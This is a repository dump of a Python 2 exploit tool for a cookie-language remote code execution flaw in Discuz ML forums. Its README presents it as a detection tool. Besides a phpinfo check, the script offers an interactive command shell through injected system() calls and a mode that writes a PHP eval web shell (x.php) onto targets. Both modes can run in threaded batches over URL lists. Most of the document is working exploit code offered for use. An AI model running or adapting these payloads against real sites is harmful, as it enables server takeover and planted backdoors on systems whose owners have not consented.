├── LICENSE
├── README.md
├── batch_result
    └── 20190715111111
    │   ├── failed-checked.txt
    │   └── success-checked.txt
├── demo
    ├── dzmlrce01.png
    ├── dzmlrce02.png
    ├── dzmlrce03.png
    ├── dzmlrce04.png
    ├── dzmlrce06.png
    └── dzmlrce09.png
├── dz-ml-rce.py
├── requirements.txt
└── urls.txt


/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2019 LSA
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | dz-ml-rce.py ：discuz ml RCE 漏洞检测工具
 2 | ==
 3 | ----------------
 4 | 
 5 | 
 6 | # 概述
 7 | <br/>
 8 | 漏洞在于cookie的language可控并且没有严格过滤，导致可以远程代码执行，详情参考
 9 | 
10 | [discuz ml RCE漏洞重现及分析](http://www.lsablog.com/networksec/penetration/discuz-ml-rce-analysis/)
11 | 
12 | <br/>
13 | 本工具支持单url和批量检测，有判断模式（只判断有无该漏洞）、cmdshell模式（返回简单的cmd shell）和getshell模式（写入一句话木马）。
14 | 
15 | 
16 | ----------------
17 | 
18 | # 需求
19 | <br/>
20 | python2.7<br/>
21 | pip -r requirements.txt
22 | <br/><br/>
23 | 
24 | **使用时加上漏洞PHP页面（如forum.php,portal.php），直接写域名可能会重定向导致误报!**
25 | 
26 | ----------------
27 | 
28 | # 快速开始
29 | <br/>
30 | 使用帮助<br/>
31 | python dz-ml-rce.py -h<br/>
32 | 
33 | ![](https://github.com/theLSA/discuz-ml-rce/raw/master/demo/dzmlrce06.png)
34 | 
35 | <br/>
36 | 判断模式<br/>
37 | python dz-ml-rce.py -u "http://www.xxx.cn/forum.php" <br/>
38 | 
39 | ![](https://github.com/theLSA/discuz-ml-rce/raw/master/demo/dzmlrce02.png)
40 | 
41 | <br/>
42 | cmdshell模式<br/>
43 | python dz-ml-rce.py -u "http://www.xxx.cn/forum.php" --cmdshell<br/>
44 | 
45 | ![](https://github.com/theLSA/discuz-ml-rce/raw/master/demo/dzmlrce03.png)
46 | 
47 | <br/>
48 | getshell模式<br/>
49 | python dz-ml-rce.py -u "http://www.xxx.cn/forum.php" --getshell<br/>
50 | 
51 | ![](https://github.com/theLSA/discuz-ml-rce/raw/master/demo/dzmlrce04.png)
52 | 
53 | <br/>
54 | 批量检测<br/>
55 | python dz-ml-rce.py -f urls.txt<br/>
56 | 
57 | ![](https://github.com/theLSA/discuz-ml-rce/raw/master/demo/dzmlrce01.png)
58 | 
59 | <br/>
60 | 批量getshell<br/>
61 | python dz-ml-rce.py -f urls.txt --getshell<br/>
62 | 
63 | ![](https://github.com/theLSA/discuz-ml-rce/raw/master/demo/dzmlrce09.png)
64 | 
65 | 
66 | ----------------
67 | 
68 | 
69 | # TODO
70 | 有空会做各种优化。
71 | 
72 | 
73 | ----------------
74 | 
75 | # 反馈
76 | [issus](https://github.com/theLSA/discuz-ml-rce/issues)
77 | <br/>
78 | 博客：http://www.lsablog.com/networksec/penetration/discuz-ml-rce-analysis/
79 | <br/>
80 | gmail：lsasguge196@gmail.com
81 | <br/>
82 | qq：2894400469@qq.com
83 | 
84 | 


--------------------------------------------------------------------------------
/batch_result/20190715111111/failed-checked.txt:
--------------------------------------------------------------------------------
1 | http://www.xxx.com/home.php


--------------------------------------------------------------------------------
/batch_result/20190715111111/success-checked.txt:
--------------------------------------------------------------------------------
1 | http://www.xxx.cn/forum.php


--------------------------------------------------------------------------------
/demo/dzmlrce01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/discuz-ml-rce/5705d5d4c6f10dfeeea11670d6c9e6e1a052ea5f/demo/dzmlrce01.png


--------------------------------------------------------------------------------
/demo/dzmlrce02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/discuz-ml-rce/5705d5d4c6f10dfeeea11670d6c9e6e1a052ea5f/demo/dzmlrce02.png


--------------------------------------------------------------------------------
/demo/dzmlrce03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/discuz-ml-rce/5705d5d4c6f10dfeeea11670d6c9e6e1a052ea5f/demo/dzmlrce03.png


--------------------------------------------------------------------------------
/demo/dzmlrce04.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/discuz-ml-rce/5705d5d4c6f10dfeeea11670d6c9e6e1a052ea5f/demo/dzmlrce04.png


--------------------------------------------------------------------------------
/demo/dzmlrce06.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/discuz-ml-rce/5705d5d4c6f10dfeeea11670d6c9e6e1a052ea5f/demo/dzmlrce06.png


--------------------------------------------------------------------------------
/demo/dzmlrce09.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/discuz-ml-rce/5705d5d4c6f10dfeeea11670d6c9e6e1a052ea5f/demo/dzmlrce09.png


--------------------------------------------------------------------------------
/dz-ml-rce.py:
--------------------------------------------------------------------------------
  1 | # coding:utf-8
  2 | # Author:LSA
  3 | # Description:discuz ml rce(cookie-language)
  4 | # Date:20190714
  5 | 
  6 | 
  7 | import requests
  8 | import optparse
  9 | #from requests.packages import urllib3
 10 | import sys
 11 | import urllib3
 12 | import re
 13 | from bs4 import BeautifulSoup
 14 | import Queue
 15 | import threading
 16 | import os
 17 | import datetime
 18 | 
 19 | 
 20 | 
 21 | reload(sys)
 22 | sys.setdefaultencoding('utf-8')
 23 | 
 24 | 
 25 | 
 26 | lock = threading.Lock()
 27 | q0 = Queue.Queue()
 28 | threadList = []
 29 | global success_count
 30 | success_count = 0
 31 | 
 32 | 
 33 | total_count = 0
 34 | 
 35 | 
 36 | def get_setcookie_language_value(tgtUrl,timeout):
 37 | 
 38 |     urllib3.disable_warnings()
 39 |     tgtUrl = tgtUrl
 40 |     try:
 41 |         rsp = requests.get(tgtUrl, timeout=timeout, verify=False)
 42 |         rsp_setcookie = rsp.headers['Set-Cookie']
 43 |         # print rsp.text
 44 |         pattern = re.compile(r'(.*?)language=')
 45 |         language_pattern = pattern.findall(rsp_setcookie)
 46 |         setcookie_language = language_pattern[0].split(' ')[-1].strip() + 'language=en'
 47 |         return str(setcookie_language)
 48 | 
 49 |     except:
 50 |         print str(tgtUrl) + ' get setcookie language value error!'
 51 |         return 'get-setcookie-language-value-error'
 52 | 
 53 | 
 54 | def dz_ml_rce_check(tgtUrl, setcookie_language_value, timeout):
 55 | 
 56 |     tgtUrl = tgtUrl
 57 |     check_payload = setcookie_language_value + '\'.phpinfo().\';'
 58 |     headers = {}
 59 | 
 60 |     headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36";
 61 |     headers["Cookie"] = check_payload;
 62 | 
 63 |     check_rsp = requests.get(tgtUrl,headers=headers,timeout=timeout,verify=False)
 64 |     #print headers['Cookie']
 65 |     if check_rsp.status_code == 200:
 66 |         try:
 67 |             if (check_rsp.text.index('PHP Version')):
 68 |                 print 'target is vulnerable!!!'
 69 | 
 70 |             else:
 71 |                 soup = BeautifulSoup(check_rsp.text, 'lxml')
 72 |                 if (soup.find('title')):
 73 |                     print 'target seem not vulnerable-' + 'return title: ' + str(soup.title.string) + '\n'
 74 |         except ValueError, e:
 75 |                 print 'target seem not vulnerable-' + e.__repr__()
 76 |         except:
 77 |                 print 'target seem not vulnerable-Unknown error.'
 78 |     else:
 79 |         print 'Target seem not vulnerable-status code: ' + str(check_rsp.status_code) + '\n'
 80 | 
 81 | 
 82 | 
 83 | def dz_ml_rce_cmdshell(tgtUrl, setcookie_language_value, timeout):
 84 | 
 85 |     #cmdshell_pattern = re.compile(r'([\s][\S]*?)<!DOCTYPE html')
 86 | 
 87 | 
 88 |     tgtUrl = tgtUrl
 89 | 
 90 |     cmd_exp = '\'.system(\'{0}\').\';'
 91 | 
 92 |     cmd_test = 'echo zxc000'
 93 | 
 94 |     cmd_exp_test = setcookie_language_value + cmd_exp.format(cmd_test)
 95 | 
 96 |     headers = {}
 97 | 
 98 |     headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36";
 99 |     headers["Cookie"] = cmd_exp_test;
100 | 
101 | 
102 |     cmd_exp_rsp = requests.get(tgtUrl,headers=headers,timeout=timeout,verify=False)
103 |     if cmd_exp_rsp.status_code == 200:
104 |         if 'zxc000' in cmd_exp_rsp.text:
105 |             print 'Get cmdshell success! type exit to exit.'
106 | 
107 |             while True:
108 |                 command = raw_input("cmd>>> ")
109 |                 if command == 'exit':
110 |                     break
111 |                 cmd_exp_send = setcookie_language_value + cmd_exp.format(command)
112 |                 headers['Cookie'] = cmd_exp_send
113 |                 cmd_exp_rsp = requests.get(tgtUrl,headers=headers,timeout=timeout,verify=False)
114 |                 cmdshell_result = cmd_exp_rsp.text[0:1000].split('<!DOCTYPE html')[0].strip()
115 |                 #cmdshell_result = cmdshell_pattern.findall(cmd_exp_rsp.text[0:100])
116 |                 print cmdshell_result
117 |         else:
118 |             print 'Get cmdshell seem failed-can not find zxc000.'
119 |     else:
120 |         print 'Get cmdshell seem failed-status code: ' + str(cmd_exp_rsp.status_code) + '\n'
121 | 
122 | 
123 | 
124 | def dz_ml_rce_getshell(tgtUrl, setcookie_language_value, timeout):
125 |     getshell_exp = '\'.file_put_contents%28%27x.php%27%2Curldecode%28%27%253c%253fphp%2520@eval%28%2524_%25%35%30%25%34%66%25%35%33%25%35%34%255b%2522x%2522%255d%29%253b%253f%253e%27%29%29.\';'
126 |     getshell_exp_send = setcookie_language_value + getshell_exp
127 | 
128 |     headers = {}
129 | 
130 |     headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36";
131 | 
132 |     headers['Cookie'] = getshell_exp_send
133 | 
134 |     filename = tgtUrl.split('/')[-1]
135 | 
136 |     getshell_rsp = requests.get(tgtUrl, headers=headers, timeout=timeout, verify=False)
137 |     # print headers['Cookie']
138 |     if getshell_rsp.status_code == 200:
139 |         getshell_rsp1 = requests.get(tgtUrl.split(filename)[0] + 'x.php', timeout=timeout, verify=False)
140 |         #print tgtUrl.split('/')[-1]
141 |         #print tgtUrl.split(filename)[0] + 'x.php'
142 |         if (getshell_rsp1.status_code) == 200 and (getshell_rsp1.text == ""):
143 |             print 'Getshell success!-shellPath:' + tgtUrl.split(filename)[0] + 'x.php'
144 |         else:
145 |             #soup = BeautifulSoup(getshell_rsp1.text, 'lxml')
146 |             print 'Getshell failed!-rsp1 status code: ' + str(getshell_rsp1.status_code) + '\nrsp1 text: ' + getshell_rsp1.text[0:100]
147 | 
148 |     else:
149 |         print 'Target seem not vulnerable-status code: ' + str(getshell_rsp.status_code) + '\n'
150 | 
151 | 
152 | 
153 | def dz_ml_rce_check_batch(timeout,f4success,f4fail):
154 | 
155 |     global total_count
156 |     headers = {}
157 | 
158 |     headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36";
159 | 
160 |     while(not q0.empty()):
161 |         tgtUrl = q0.get()
162 |         qcount = q0.qsize()
163 |         print 'Checking: ' + tgtUrl + ' ---[' + str(total_count - qcount) + '/' + str(total_count) + ']'
164 | 
165 |         setcookie_language_value = get_setcookie_language_value(tgtUrl,timeout)
166 |         if setcookie_language_value == 'get-setcookie-language-value-error':
167 |             lock.acquire()
168 |             f4fail.write(tgtUrl + ': ' + 'get setcookie language value error' + '\n')
169 |             lock.release()
170 |             continue
171 | 
172 |         check_payload = str(setcookie_language_value) + '\'.phpinfo().\';'
173 |         headers["Cookie"] = check_payload;
174 | 
175 |         try:
176 |             check_batch_rsp = requests.get(tgtUrl, headers=headers, timeout=timeout, verify=False)
177 | 
178 |         except requests.exceptions.Timeout:
179 |             #print tgtUrl + ' Checked failed! Error: Timeout'
180 |             lock.acquire()
181 |             f4fail.write(tgtUrl + ': ' + 'Checked failed! Error: Timeout' + '\n')
182 |             lock.release()
183 |             continue
184 | 
185 |         except requests.exceptions.ConnectionError:
186 |             #print tgtUrl + ' Checked failed! Error: ConnectionError'
187 |             lock.acquire()
188 |             f4fail.write(tgtUrl + ': ' + 'Checked failed! Error: ConnectionError' + '\n')
189 |             lock.release()
190 |             continue
191 | 
192 |         except:
193 |             #print tgtUrl + ' Checked failed! Error: Unknown error'
194 |             lock.acquire()
195 |             f4fail.write(tgtUrl + ': ' + 'Checked failed! Error: Unknown error' + '\n')
196 |             lock.release()
197 |             continue
198 | 
199 |         if check_batch_rsp.status_code == 200:
200 |             try:
201 |                 if (check_batch_rsp.text.index('PHP Version')):
202 |                     print tgtUrl + ' is vulnerable!!!'
203 |                     lock.acquire()
204 |                     f4success.write(tgtUrl+'\n')
205 |                     lock.release()
206 |                     global success_count
207 |                     success_count = success_count + 1
208 | 
209 |                 else:
210 |                     lock.acquire()
211 |                     f4fail.write(tgtUrl + ': ' + 'Checked failed!' + '\n')
212 |                     lock.release()
213 |             except ValueError, e:
214 |                 #print tgtUrl + ' seem not vulnerable-' + e.__repr__()
215 |                 lock.acquire()
216 |                 f4fail.write(tgtUrl + ': ' + 'Checked failed! Error: ' + e.__repr__() + '\n')
217 |                 lock.release()
218 |                 continue
219 |             except:
220 |                 #print tgtUrl + ' seem not vulnerable-Unknown error.'
221 |                 lock.acquire()
222 |                 f4fail.write(tgtUrl + ': ' + 'Checked failed! Error: Unknown error.'+'\n')
223 |                 lock.release()
224 |                 continue
225 |         else:
226 |             #print tgtUrl + ' seem not vulnerable-status code: ' + str(check_batch_rsp.status_code) + '\n'
227 |             lock.acquire()
228 |             f4fail.write(tgtUrl + ' Checked failed! Error: '+ str(check_batch_rsp.status_code) + '\n')
229 |             lock.release()
230 | 
231 | def dz_ml_rce_getshell_batch(timeout,f4success,f4fail):
232 | 
233 | 
234 |     headers = {}
235 | 
236 |     headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36";
237 | 
238 |     global total_count
239 |     while(not q0.empty()):
240 |         tgtUrl = q0.get()
241 |         qcount = q0.qsize()
242 |         print 'Checking: ' + tgtUrl + ' ---[' + str(total_count - qcount) + '/' + str(total_count) + ']'
243 | 
244 |         setcookie_language_value = get_setcookie_language_value(tgtUrl,timeout)
245 |         if setcookie_language_value == 'get-setcookie-language-value-error':
246 |             lock.acquire()
247 |             f4fail.write(tgtUrl + ': ' + 'get setcookie language value error' + '\n')
248 |             lock.release()
249 |             continue
250 | 
251 | 
252 |         getshell_exp = '\'.file_put_contents%28%27x.php%27%2Curldecode%28%27%253c%253fphp%2520@eval%28%2524_%25%35%30%25%34%66%25%35%33%25%35%34%255b%2522x%2522%255d%29%253b%253f%253e%27%29%29.\';'
253 |         getshell_exp_send = setcookie_language_value + getshell_exp
254 |         headers["Cookie"] = getshell_exp_send
255 | 
256 |         try:
257 |             getshell_batch_rsp = requests.get(tgtUrl, headers=headers, timeout=timeout, verify=False)
258 | 
259 |         except requests.exceptions.Timeout:
260 |             #print tgtUrl + ' Checked failed! Error: Timeout'
261 |             lock.acquire()
262 |             f4fail.write(tgtUrl + ': ' + 'Checked failed! Error: Timeout' + '\n')
263 |             lock.release()
264 |             continue
265 | 
266 |         except requests.exceptions.ConnectionError:
267 |             #print tgtUrl + ' Checked failed! Error: ConnectionError'
268 |             lock.acquire()
269 |             f4fail.write(tgtUrl + ': ' + 'Checked failed! Error: ConnectionError' + '\n')
270 |             lock.release()
271 |             continue
272 | 
273 |         except:
274 |             #print tgtUrl + ' Checked failed! Error: Unknown error'
275 |             lock.acquire()
276 |             f4fail.write(tgtUrl + ': ' + 'Checked failed! Error: Unknown error' + '\n')
277 |             lock.release()
278 |             continue
279 | 
280 |         if getshell_batch_rsp.status_code == 200:
281 |             filename = tgtUrl.split('/')[-1]
282 |             getshell_batch_rsp1 = requests.get(tgtUrl.split(filename)[0] + 'x.php', timeout=timeout, verify=False)
283 | 
284 |             if (getshell_batch_rsp1.status_code) == 200 and (getshell_batch_rsp1.text == ""):
285 |                 print 'Getshell success!-shellPath:' + tgtUrl.split(filename)[0] + 'x.php'
286 |                 lock.acquire()
287 |                 f4success.write(tgtUrl.split(filename)[0] + 'x.php' + '\n')
288 |                 lock.release()
289 |                 global success_count
290 |                 success_count = success_count + 1
291 |             else:
292 |                 # soup = BeautifulSoup(getshell_rsp1.text, 'lxml')
293 |                 #print 'Getshell failed!-rsp1 status code: ' + str(getshell_batch_rsp1.status_code) + '\nrsp1 text: ' + getshell_batch_rsp1.text[0:100]
294 |                 lock.acquire()
295 |                 f4fail.write(tgtUrl + '-' + 'Getshell failed!-rsp1 status code: ' + str(getshell_batch_rsp1.status_code) + '\n')
296 |                 lock.release()
297 | 
298 |         else:
299 |             #print tgtUrl + ' seem not vulnerable-status code: ' + str(check_batch_rsp.status_code) + '\n'
300 |             lock.acquire()
301 |             f4fail.write(tgtUrl + ' Getshell failed! Error: '+ str(getshell_batch_rsp.status_code) + '\n')
302 |             lock.release()
303 | 
304 | 
305 | 
306 | def main():
307 |     parser = optparse.OptionParser('python %prog ' + '-h', version= '%prog v1.0')
308 | 
309 |     parser.add_option('-u', dest='tgtUrl', type='string', help='single target url')
310 |     parser.add_option('-s', dest='timeout', type='int', default=7, help='timeout(seconds)')
311 |     # parser.add_option('--check',dest='check',action='store_true',help='check url')
312 |     parser.add_option('--getshell', dest='getshell', action='store_true', help='write a shell to target url-x.php,pwd is x')
313 |     parser.add_option('--cmdshell', dest='cmdshell', action='store_true', help='cmd shell mode')
314 | 
315 |     parser.add_option('-f', dest='tgtUrlsPath', type ='string', help='urls filepath')
316 |     parser.add_option('-t', dest='threads', type='int', default=5, help='the number of threads')
317 | 
318 |     (options, args) = parser.parse_args()
319 | 
320 |     getshell = options.getshell
321 |     cmdshell = options.cmdshell
322 |     timeout = options.timeout
323 |     tgtUrl = options.tgtUrl
324 | 
325 | 
326 |     global total_count
327 | 
328 |     if tgtUrl and (getshell is None and cmdshell is None):
329 |         setcookie_language_value = get_setcookie_language_value(tgtUrl, timeout)
330 |         if setcookie_language_value == 'get-setcookie-language-value-error':
331 |             sys.exit()
332 |         #print setcookie_language_value
333 |         dz_ml_rce_check(tgtUrl, setcookie_language_value, timeout)
334 |     if tgtUrl and cmdshell:
335 |         setcookie_language_value = get_setcookie_language_value(tgtUrl, timeout)
336 |         if setcookie_language_value == 'get-setcookie-language-value-error':
337 |             sys.exit()
338 |         dz_ml_rce_cmdshell(tgtUrl, setcookie_language_value, timeout)
339 |     if tgtUrl and getshell:
340 |         setcookie_language_value = get_setcookie_language_value(tgtUrl, timeout)
341 |         if setcookie_language_value == 'get-setcookie-language-value-error':
342 |             sys.exit()
343 |         dz_ml_rce_getshell(tgtUrl, setcookie_language_value, timeout)
344 | 
345 |     if options.tgtUrlsPath and (getshell is None):
346 |         tgtFilePath = options.tgtUrlsPath
347 |         threads = options.threads
348 |         nowtime = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
349 |         os.mkdir('batch_result/' + str(nowtime))
350 |         f4success = open('batch_result/' + str(nowtime) + '/' + 'success-checked.txt', 'w')
351 |         f4fail = open('batch_result/' + str(nowtime) + '/' + 'failed-checked.txt', 'w')
352 |         urlsFile = open(tgtFilePath)
353 | 
354 |         total_count = len(open(tgtFilePath, 'rU').readlines())
355 | 
356 |         print '===Total ' + str(total_count) + ' urls==='
357 | 
358 |         for urls in urlsFile:
359 |             tgtUrls = urls.strip()
360 |             q0.put(tgtUrls)
361 |         for thread in range(threads):
362 |             t = threading.Thread(target=dz_ml_rce_check_batch, args=(timeout, f4success, f4fail))
363 |             t.start()
364 |             threadList.append(t)
365 |         for th in threadList:
366 |             th.join()
367 | 
368 |         print '\n###Finished! [success/total]: ' + '[' + str(success_count) + '/' + str(total_count) + ']###'
369 |         print 'Results were saved in ./batch_result/' + str(nowtime) + '/'
370 |         f4success.close()
371 |         f4fail.close()
372 | 
373 |     if options.tgtUrlsPath and getshell:
374 |         tgtFilePath = options.tgtUrlsPath
375 |         threads = options.threads
376 |         nowtime = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
377 |         os.mkdir('batch_result/' + str(nowtime))
378 |         f4success = open('batch_result/' + str(nowtime) + '/' + 'success-getshell.txt', 'w')
379 |         f4fail = open('batch_result/' + str(nowtime) + '/' + 'failed-getshell.txt', 'w')
380 |         urlsFile = open(tgtFilePath)
381 |         #global total_count
382 |         total_count = len(open(tgtFilePath, 'rU').readlines())
383 | 
384 |         print '===Total ' + str(total_count) + ' urls==='
385 | 
386 |         for urls in urlsFile:
387 |             tgtUrls = urls.strip()
388 |             q0.put(tgtUrls)
389 |         for thread in range(threads):
390 |             t = threading.Thread(target=dz_ml_rce_getshell_batch, args=(timeout, f4success, f4fail))
391 |             t.start()
392 |             threadList.append(t)
393 |         for th in threadList:
394 |             th.join()
395 | 
396 |         print '\n###Finished! [success/total]: ' + '[' + str(success_count) + '/' + str(total_count) + ']###'
397 |         print 'Results were saved in ./batch_result/' + str(nowtime) + '/'
398 |         f4success.close()
399 |         f4fail.close()
400 | 
401 | 
402 | 
403 | 
404 | if __name__ == '__main__':
405 | 
406 |     main()


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | urllib3==1.25.3
2 | requests==2.22.0
3 | beautifulsoup4==4.7.1
4 | 


--------------------------------------------------------------------------------
/urls.txt:
--------------------------------------------------------------------------------
1 | http://xxx.org/discuzx/portal.php
2 | http://www.aaa.org.cn/forum.php
3 | https://www.bbb.com/forum.php
4 | 


--------------------------------------------------------------------------------